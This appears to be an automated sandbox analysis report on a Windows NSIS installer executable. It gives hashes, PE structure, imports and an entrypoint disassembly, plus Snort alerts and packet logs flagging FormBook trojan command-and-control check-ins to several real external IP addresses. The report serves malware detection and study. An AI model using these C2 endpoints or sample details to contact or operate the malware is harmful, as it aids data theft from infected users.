                                                                                                      Preview: U.......3.... .....!.....".....#.....$.....%...o.&.....'.....(.....).....*...8.+.....,...o.-.........../.....0.....1.....2.....3.....4.....5.....6.....7... .8.....9...1.:.....;.....<.....=.....>.....?.....@.....A.....B...0.C...k.D.....E.....F.....G...g.H.....I.....J...H.K.....L.....M.....N.....O...r.P.....Q.....R.....S.....T.....U.....V...k.W.....X.....Y.....Z.....[.....\.....]...k.^....._.....`...].a...X.b...1.c.....d.....e.....f.....g.....h.....i.....j.....k...<.l...y.m...y.n...y.o...k.p.....q...x.r.....s...g.t.....u.....v...H.w.....x.....y.....z...x.{...r.|.....}.....~...............x...........k...........x.............................k.................].....X.....1...........................................................y.....y.....y.....k.......................g.................H.............................r..............................

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                      Entropy (8bit):7.912728398567341
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:KY4cmAI0jU.exe
                                                                                                      File size:224710
                                                                                                      MD5:8c35ac8d43f7e59105902fa16114144e
                                                                                                      SHA1:c1a0e5de1121e55c22649182c923b41efd4e2848
                                                                                                      SHA256:1a08fc838c4ebab6b986b6010e2074a05c29916cd38096e7f7d26a6455917508
                                                                                                      SHA512:f89da0804389f71e3627b9bcc5299d6eaab0649197d1084fb3b6f63e4bd126baf333c9781aa02c3666ac59e79cb645487cfdbe19061b1c5119098529bfbd7f18
                                                                                                      SSDEEP:6144:Ds9p+npLadPGnTF8SnI8ey8uLSJB6+i940vqC7J:yptdenTiSnI8ethi9aaJ
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                                      File Icon

                                                                                                      Icon Hash:b2a88c96b2ca6a72

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x40323c
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:099c0646ea7282d232219f8807883be0

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      sub esp, 00000180h
                                                                                                      push ebx
                                                                                                      push ebp
                                                                                                      push esi
                                                                                                      xor ebx, ebx
                                                                                                      push edi
                                                                                                      mov dword ptr [esp+18h], ebx
                                                                                                      mov dword ptr [esp+10h], 00409130h
                                                                                                      xor esi, esi
                                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                                      call dword ptr [00407030h]
                                                                                                      push 00008001h
                                                                                                      call dword ptr [004070B4h]
                                                                                                      push ebx
                                                                                                      call dword ptr [0040727Ch]
                                                                                                      push 00000008h
                                                                                                      mov dword ptr [00423F58h], eax
                                                                                                      call 00007F5D0CDC427Eh
                                                                                                      mov dword ptr [00423EA4h], eax
                                                                                                      push ebx
                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                      push 00000160h
                                                                                                      push eax
                                                                                                      push ebx
                                                                                                      push 0041F458h
                                                                                                      call dword ptr [00407158h]
                                                                                                      push 004091B8h
                                                                                                      push 004236A0h
                                                                                                      call 00007F5D0CDC3F31h
                                                                                                      call dword ptr [004070B0h]
                                                                                                      mov edi, 00429000h
                                                                                                      push eax
                                                                                                      push edi
                                                                                                      call 00007F5D0CDC3F1Fh
                                                                                                      push ebx
                                                                                                      call dword ptr [0040710Ch]
                                                                                                      cmp byte ptr [00429000h], 00000022h
                                                                                                      mov dword ptr [00423EA0h], eax
                                                                                                      mov eax, edi
                                                                                                      jne 00007F5D0CDC167Ch
                                                                                                      mov byte ptr [esp+14h], 00000022h
                                                                                                      mov eax, 00429001h
                                                                                                      push dword ptr [esp+14h]
                                                                                                      push eax
                                                                                                      call 00007F5D0CDC3A12h
                                                                                                      push eax
                                                                                                      call dword ptr [0040721Ch]
                                                                                                      mov dword ptr [esp+1Ch], eax
                                                                                                      jmp 00007F5D0CDC16D5h
                                                                                                      cmp cl, 00000020h
                                                                                                      jne 00007F5D0CDC1678h
                                                                                                      inc eax
                                                                                                      cmp byte ptr [eax], 00000020h
                                                                                                      je 00007F5D0CDC166Ch
                                                                                                      cmp byte ptr [eax], 00000022h
                                                                                                      mov byte ptr [eax+eax+00h], 00000000h

                                                                                                      Rich Headers

                                                                                                      Programming Language:
                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                                      RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                                      RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                                      RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                                      RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                                      RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                      USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                      GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                      SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                      ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                      ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                      VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Snort IDS Alerts

                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      06/11/21-09:02:36.107449TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.3172.67.206.33
                                                                                                      06/11/21-09:02:36.107449TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.3172.67.206.33
                                                                                                      06/11/21-09:02:36.107449TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973080192.168.2.3172.67.206.33
                                                                                                      06/11/21-09:02:57.061426TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.3104.21.89.72
                                                                                                      06/11/21-09:02:57.061426TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.3104.21.89.72
                                                                                                      06/11/21-09:02:57.061426TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973880192.168.2.3104.21.89.72
                                                                                                      06/11/21-09:03:13.687930TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.33.34.12.41
                                                                                                      06/11/21-09:03:13.687930TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.33.34.12.41
                                                                                                      06/11/21-09:03:13.687930TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974280192.168.2.33.34.12.41
                                                                                                      06/11/21-09:03:33.391097ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                                                                                      06/11/21-09:03:34.391709ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jun 11, 2021 09:02:36.064456940 CEST4973080192.168.2.3172.67.206.33
                                                                                                      Jun 11, 2021 09:02:36.107199907 CEST8049730172.67.206.33192.168.2.3
                                                                                                      Jun 11, 2021 09:02:36.107331991 CEST4973080192.168.2.3172.67.206.33
                                                                                                      Jun 11, 2021 09:02:36.107449055 CEST4973080192.168.2.3172.67.206.33
                                                                                                      Jun 11, 2021 09:02:36.152012110 CEST8049730172.67.206.33192.168.2.3
                                                                                                      Jun 11, 2021 09:02:36.198753119 CEST8049730172.67.206.33192.168.2.3
                                                                                                      Jun 11, 2021 09:02:36.199132919 CEST4973080192.168.2.3172.67.206.33
                                                                                                      Jun 11, 2021 09:02:36.199173927 CEST8049730172.67.206.33192.168.2.3
                                                                                                      Jun 11, 2021 09:02:36.199248075 CEST4973080192.168.2.3172.67.206.33
                                                                                                      Jun 11, 2021 09:02:36.243094921 CEST8049730172.67.206.33192.168.2.3
                                                                                                      Jun 11, 2021 09:02:46.330689907 CEST4973680192.168.2.3104.18.193.20
                                                                                                      Jun 11, 2021 09:02:46.375637054 CEST8049736104.18.193.20192.168.2.3
                                                                                                      Jun 11, 2021 09:02:46.375842094 CEST4973680192.168.2.3104.18.193.20
                                                                                                      Jun 11, 2021 09:02:46.375958920 CEST4973680192.168.2.3104.18.193.20
                                                                                                      Jun 11, 2021 09:02:46.418087006 CEST8049736104.18.193.20192.168.2.3
                                                                                                      Jun 11, 2021 09:02:46.430977106 CEST8049736104.18.193.20192.168.2.3
                                                                                                      Jun 11, 2021 09:02:46.431135893 CEST8049736104.18.193.20192.168.2.3
                                                                                                      Jun 11, 2021 09:02:46.431207895 CEST4973680192.168.2.3104.18.193.20
                                                                                                      Jun 11, 2021 09:02:46.431240082 CEST4973680192.168.2.3104.18.193.20
                                                                                                      Jun 11, 2021 09:02:46.473290920 CEST8049736104.18.193.20192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.532536030 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:51.728164911 CEST8049737173.234.255.253192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.728344917 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:51.728471041 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:51.927200079 CEST8049737173.234.255.253192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.927234888 CEST8049737173.234.255.253192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.927257061 CEST8049737173.234.255.253192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.927275896 CEST8049737173.234.255.253192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.927292109 CEST8049737173.234.255.253192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.927546978 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:51.927597046 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:51.927602053 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:51.927604914 CEST4973780192.168.2.3173.234.255.253
                                                                                                      Jun 11, 2021 09:02:57.018436909 CEST4973880192.168.2.3104.21.89.72
                                                                                                      Jun 11, 2021 09:02:57.061005116 CEST8049738104.21.89.72192.168.2.3
                                                                                                      Jun 11, 2021 09:02:57.061249018 CEST4973880192.168.2.3104.21.89.72
                                                                                                      Jun 11, 2021 09:02:57.061425924 CEST4973880192.168.2.3104.21.89.72
                                                                                                      Jun 11, 2021 09:02:57.103861094 CEST8049738104.21.89.72192.168.2.3
                                                                                                      Jun 11, 2021 09:02:57.445303917 CEST8049738104.21.89.72192.168.2.3
                                                                                                      Jun 11, 2021 09:02:57.445329905 CEST8049738104.21.89.72192.168.2.3
                                                                                                      Jun 11, 2021 09:02:57.445338964 CEST8049738104.21.89.72192.168.2.3
                                                                                                      Jun 11, 2021 09:02:57.445660114 CEST4973880192.168.2.3104.21.89.72
                                                                                                      Jun 11, 2021 09:02:57.445765972 CEST4973880192.168.2.3104.21.89.72
                                                                                                      Jun 11, 2021 09:02:57.446099997 CEST8049738104.21.89.72192.168.2.3
                                                                                                      Jun 11, 2021 09:02:57.446647882 CEST4973880192.168.2.3104.21.89.72
                                                                                                      Jun 11, 2021 09:03:07.750242949 CEST4973980192.168.2.33.143.65.214
                                                                                                      Jun 11, 2021 09:03:07.889324903 CEST80497393.143.65.214192.168.2.3
                                                                                                      Jun 11, 2021 09:03:07.889559984 CEST4973980192.168.2.33.143.65.214
                                                                                                      Jun 11, 2021 09:03:07.889676094 CEST4973980192.168.2.33.143.65.214
                                                                                                      Jun 11, 2021 09:03:08.029758930 CEST80497393.143.65.214192.168.2.3
                                                                                                      Jun 11, 2021 09:03:08.030723095 CEST80497393.143.65.214192.168.2.3
                                                                                                      Jun 11, 2021 09:03:08.030756950 CEST80497393.143.65.214192.168.2.3
                                                                                                      Jun 11, 2021 09:03:08.030939102 CEST4973980192.168.2.33.143.65.214
                                                                                                      Jun 11, 2021 09:03:08.030992031 CEST4973980192.168.2.33.143.65.214
                                                                                                      Jun 11, 2021 09:03:08.170012951 CEST80497393.143.65.214192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.403656006 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:13.687568903 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.687798023 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:13.687930107 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:13.971976995 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974311113 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974340916 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974369049 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974395990 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974432945 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974466085 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974493027 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974515915 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974529028 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:13.974536896 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974558115 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.974617958 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:13.974641085 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:14.184293985 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:14.258330107 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:14.258363008 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:14.258522034 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:14.260162115 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:14.468169928 CEST80497423.34.12.41192.168.2.3
                                                                                                      Jun 11, 2021 09:03:14.468321085 CEST4974280192.168.2.33.34.12.41
                                                                                                      Jun 11, 2021 09:03:19.269589901 CEST4974480192.168.2.3107.180.57.111
                                                                                                      Jun 11, 2021 09:03:19.407282114 CEST8049744107.180.57.111192.168.2.3
                                                                                                      Jun 11, 2021 09:03:19.407416105 CEST4974480192.168.2.3107.180.57.111
                                                                                                      Jun 11, 2021 09:03:19.407633066 CEST4974480192.168.2.3107.180.57.111
                                                                                                      Jun 11, 2021 09:03:19.545063972 CEST8049744107.180.57.111192.168.2.3
                                                                                                      Jun 11, 2021 09:03:19.565264940 CEST8049744107.180.57.111192.168.2.3
                                                                                                      Jun 11, 2021 09:03:19.565289974 CEST8049744107.180.57.111192.168.2.3
                                                                                                      Jun 11, 2021 09:03:19.565665007 CEST4974480192.168.2.3107.180.57.111
                                                                                                      Jun 11, 2021 09:03:19.565691948 CEST4974480192.168.2.3107.180.57.111
                                                                                                      Jun 11, 2021 09:03:19.703018904 CEST8049744107.180.57.111192.168.2.3
                                                                                                      Jun 11, 2021 09:03:24.680736065 CEST4975080192.168.2.345.195.169.197
                                                                                                      Jun 11, 2021 09:03:24.978627920 CEST804975045.195.169.197192.168.2.3
                                                                                                      Jun 11, 2021 09:03:24.978780985 CEST4975080192.168.2.345.195.169.197
                                                                                                      Jun 11, 2021 09:03:24.978941917 CEST4975080192.168.2.345.195.169.197
                                                                                                      Jun 11, 2021 09:03:25.279150009 CEST804975045.195.169.197192.168.2.3
                                                                                                      Jun 11, 2021 09:03:25.300106049 CEST804975045.195.169.197192.168.2.3
                                                                                                      Jun 11, 2021 09:03:25.303200006 CEST4975080192.168.2.345.195.169.197
                                                                                                      Jun 11, 2021 09:03:25.303299904 CEST4975080192.168.2.345.195.169.197
                                                                                                      Jun 11, 2021 09:03:25.601140022 CEST804975045.195.169.197192.168.2.3

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Jun 11, 2021 09:01:24.338618040 CEST5754453192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:24.388590097 CEST53575448.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:25.109719992 CEST5598453192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:25.159903049 CEST53559848.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:25.868381023 CEST6418553192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:25.928971052 CEST53641858.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:26.775058985 CEST6511053192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:26.836594105 CEST53651108.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:27.662250042 CEST5836153192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:27.712810040 CEST53583618.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:29.945643902 CEST6349253192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:29.998943090 CEST53634928.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:30.741817951 CEST6083153192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:30.794975996 CEST53608318.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:31.693821907 CEST6010053192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:31.746817112 CEST53601008.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:32.646459103 CEST5319553192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:32.697186947 CEST53531958.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:33.586540937 CEST5014153192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:33.637125015 CEST53501418.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:34.512847900 CEST5302353192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:34.563277960 CEST53530238.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:36.274436951 CEST4956353192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:36.324868917 CEST53495638.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:37.277277946 CEST5135253192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:37.328092098 CEST53513528.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:38.387057066 CEST5934953192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:38.437036991 CEST53593498.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:39.302576065 CEST5708453192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:39.353017092 CEST53570848.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:41.782471895 CEST5882353192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:41.832535028 CEST53588238.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:42.950047016 CEST5756853192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:42.999986887 CEST53575688.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:55.359546900 CEST5054053192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:55.421055079 CEST53505408.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:01:57.091483116 CEST5436653192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:01:57.154541016 CEST53543668.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:19.304805040 CEST5303453192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:19.366297960 CEST53530348.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:21.579060078 CEST5776253192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:21.639075041 CEST53577628.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:33.908291101 CEST5543553192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:33.982995987 CEST53554358.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:35.988408089 CEST5071353192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:36.054531097 CEST53507138.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:39.732753038 CEST5613253192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:39.795432091 CEST53561328.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:46.233736038 CEST5898753192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:46.329618931 CEST53589878.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:51.466469049 CEST5657953192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:51.529956102 CEST53565798.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:02:56.938940048 CEST6063353192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:02:57.016514063 CEST53606338.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:07.589299917 CEST6129253192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:07.749241114 CEST53612928.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:09.582503080 CEST6361953192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:09.659336090 CEST53636198.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:13.048239946 CEST6493853192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:13.402180910 CEST53649388.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:18.792134047 CEST6194653192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:18.860271931 CEST53619468.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:19.203794003 CEST6491053192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:19.267663002 CEST53649108.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:20.455569029 CEST5212353192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:20.517663002 CEST53521238.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:24.607898951 CEST5613053192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:24.679627895 CEST53561308.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:30.319385052 CEST5633853192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:31.326244116 CEST5633853192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:32.326234102 CEST5633853192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:32.392487049 CEST53563388.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:33.390429974 CEST53563388.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:34.391613007 CEST53563388.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:37.406413078 CEST5942053192.168.2.38.8.8.8
                                                                                                      Jun 11, 2021 09:03:37.484054089 CEST53594208.8.8.8192.168.2.3
                                                                                                      Jun 11, 2021 09:03:42.657643080 CEST5878453192.168.2.38.8.8.8
